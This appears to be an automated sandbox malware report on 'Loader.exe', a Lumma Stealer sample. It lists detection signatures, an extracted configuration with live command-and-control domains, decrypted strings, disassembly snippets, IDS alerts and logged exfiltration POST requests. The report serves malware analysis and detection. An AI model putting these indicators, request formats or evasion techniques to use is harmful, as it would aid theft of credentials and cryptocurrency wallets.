

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name: Loader.exe
Analysis ID: 1546098
MD5: cf19765d8a9a2c2fd11a7a8c4ba3deda
SHA1: 63b5142b07b7773d4201932e7834ac11eafa1ab3
SHA256: 60b98a0907f9721cf28ccd684b565f7f77a90565e9a2bd47f75c419472c25a1c
Tags: exe user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different from the original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 4560 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: CF19765D8A9A2C2FD11A7A8C4BA3DEDA)
    • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 2096 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["seallysl.site", "servicedny.site", "goalyfeastz.site", "mafnufacut.cyou", "dilemmadu.site", "contemteny.site", "opposezmny.site", "authorisev.site", "faulteyotk.site"], "Build id": "HpOoIh--17a9517add07"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Loader.exe PID: 4560 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2096 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2096 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2096 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T14:07:13.468749+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.6 | 49756 | TCP
2024-10-31T14:06:57.494593+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49711 | 104.21.41.158 | 443 | TCP
2024-10-31T14:06:59.156570+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49712 | 104.21.41.158 | 443 | TCP
2024-10-31T14:07:00.649369+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49714 | 104.21.41.158 | 443 | TCP
2024-10-31T14:07:02.067758+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49715 | 104.21.41.158 | 443 | TCP
2024-10-31T14:07:03.452181+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49716 | 104.21.41.158 | 443 | TCP
2024-10-31T14:07:05.365767+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49718 | 104.21.41.158 | 443 | TCP
2024-10-31T14:07:06.542858+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49724 | 104.21.41.158 | 443 | TCP
2024-10-31T14:07:07.633124+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49730 | 104.21.41.158 | 443 | TCP
2024-10-31T14:06:58.470442+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 104.21.41.158 | 443 | TCP
2024-10-31T14:06:59.686199+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49712 | 104.21.41.158 | 443 | TCP
2024-10-31T14:07:08.115142+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49730 | 104.21.41.158 | 443 | TCP
2024-10-31T14:06:58.470442+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 104.21.41.158 | 443 | TCP
2024-10-31T14:06:59.686199+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49712 | 104.21.41.158 | 443 | TCP
2024-10-31T14:07:06.993386+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49724 | 104.21.41.158 | 443 | TCP



AV Detection

Source: Loader.exe | Avira: detected
Source: 0.2.Loader.exe.6e4f0000.3.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["seallysl.site", "servicedny.site", "goalyfeastz.site", "mafnufacut.cyou", "dilemmadu.site", "contemteny.site", "opposezmny.site", "authorisev.site", "faulteyotk.site"], "Build id": "HpOoIh--17a9517add07"}
Source: Loader.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\gdi32.dll | Joe Sandbox ML: detected
Source: Loader.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: servicedny.site
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: authorisev.site
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: faulteyotk.site
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: dilemmadu.site
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: contemteny.site
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: goalyfeastz.site
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: opposezmny.site
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: seallysl.site
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: mafnufacut.cyou
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033AD5AF CryptUnprotectData | 3_2_033AD5AF
Source: Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: Loader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4FCB0B FindFirstFileExW | 0_2_6E4FCB0B
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch] | 0_2_6E534E60
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh] | 0_2_6E549ED0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov byte ptr [eax+ebx], 00000030h | 0_2_6E50B6D5
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov edi, edx | 0_2_6E52BF40
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [eax] | 0_2_6E54E780
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov dword ptr [eax+ebx], 30303030h | 0_2_6E50B400
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov dword ptr [eax+ebx], 20202020h | 0_2_6E50B400
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ecx, ebx | 0_2_6E52B43A
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ecx, byte ptr [edi+ebx] | 0_2_6E50FC20
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ecx, eax | 0_2_6E518CD6
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_6E526CCE
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h | 0_2_6E545570
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ebx, byte ptr [edx+esi] | 0_2_6E516D60
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov byte ptr [ebx], dl | 0_2_6E51AD0D
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov byte ptr [ebx], dl | 0_2_6E51AD3E
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [eax] | 0_2_6E54E5F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h] | 0_2_6E52E5E0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ecx, eax | 0_2_6E518D96
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then jmp eax | 0_2_6E527A3E
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_6E526AE0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h] | 0_2_6E549BE0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov edi, esi | 0_2_6E5290DE
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [ebx], ax | 0_2_6E529910
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_6E529910
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ebx, eax | 0_2_6E517900
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov edx, ecx | 0_2_6E51B92B
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h] | 0_2_6E51A9B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h] | 0_2_6E51B1AC
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov edx, ecx | 0_2_6E51B1AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 3_2_033D137E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 3_2_033BEB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 3_2_033BEB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then lea edx, dword ptr [eax-80h] | 3_2_033BEB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch] | 3_2_033BEB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh] | 3_2_033BEB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov dword ptr [esi+04h], eax | 3_2_033BEB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al | 3_2_033BEB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 3_2_033D13D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h] | 3_2_033A0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], dl | 3_2_033A0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h] | 3_2_033A0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 3_2_033A0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 3_2_033A0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h] | 3_2_033A011A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], dl | 3_2_033A011A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h] | 3_2_033A011A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 3_2_033A011A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 3_2_033A011A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, eax | 3_2_033CA97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [eax+ebx*8], 7CDE1E50h | 3_2_033CA97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h | 3_2_033CA97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx esi, byte ptr [eax] | 3_2_033D41F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp eax | 3_2_033AD5AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, ebx | 3_2_033B1333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edi, edx | 3_2_033B1B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp edx | 3_2_033D33B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then xor byte ptr [ecx+ebx], bl | 3_2_033D33B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx esi, byte ptr [eax] | 3_2_033D4380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_033BCA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_033BCA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch] | 3_2_033BAA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp eax | 3_2_033BAA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh] | 3_2_033CFAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [eax+ebx], 00000030h | 3_2_033912D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp edx | 3_2_033D32C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then xor byte ptr [ecx+ebx], bl | 3_2_033D32C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h | 3_2_033CB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [edx+esi] | 3_2_0339C960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 3_2_0339E996
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h] | 3_2_033B41E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp edx | 3_2_033D31D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then xor byte ptr [ecx+ebx], bl | 3_2_033D31D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [edi+ebx] | 3_2_03395820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 3_2_033BE870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 3_2_0339E8D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_033AC8CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then xor byte ptr [ecx+ebx], bl | 3_2_033D3720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+52B71DE2h] | 3_2_033D1720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h | 3_2_033B5F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edi, word ptr [edx] | 3_2_033B8F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h] | 3_2_033CF7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov dword ptr [esp+3Ch], 595A5B84h | 3_2_033D0E3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 3_2_033BDE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-67BC38F0h] | 3_2_033D1648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_033AC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edi, dword ptr [esp+54h] | 3_2_033BCEDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx eax, word ptr [esi+ecx] | 3_2_033CC6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [ebx], ax | 3_2_033AF510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_033AF510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ebx, eax | 3_2_0339D500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 3_2_033BE400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp al, 2Eh | 3_2_033BAC04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_033C7CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edi, esi | 3_2_033AECDE

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49730 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49712 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49724 -> 104.21.41.158:443
Source: Malware configuration extractor | URLs: seallysl.site
Source: Malware configuration extractor | URLs: servicedny.site
Source: Malware configuration extractor | URLs: goalyfeastz.site
Source: Malware configuration extractor | URLs: mafnufacut.cyou
Source: Malware configuration extractor | URLs: dilemmadu.site
Source: Malware configuration extractor | URLs: contemteny.site
Source: Malware configuration extractor | URLs: opposezmny.site
Source: Malware configuration extractor | URLs: authorisev.site
Source: Malware configuration extractor | URLs: faulteyotk.site
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 104.21.41.158:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49756
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mafnufacut.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 86 | Host: mafnufacut.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12866 | Host: mafnufacut.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15112 | Host: mafnufacut.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19970 | Host: mafnufacut.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1241 | Host: mafnufacut.cyou
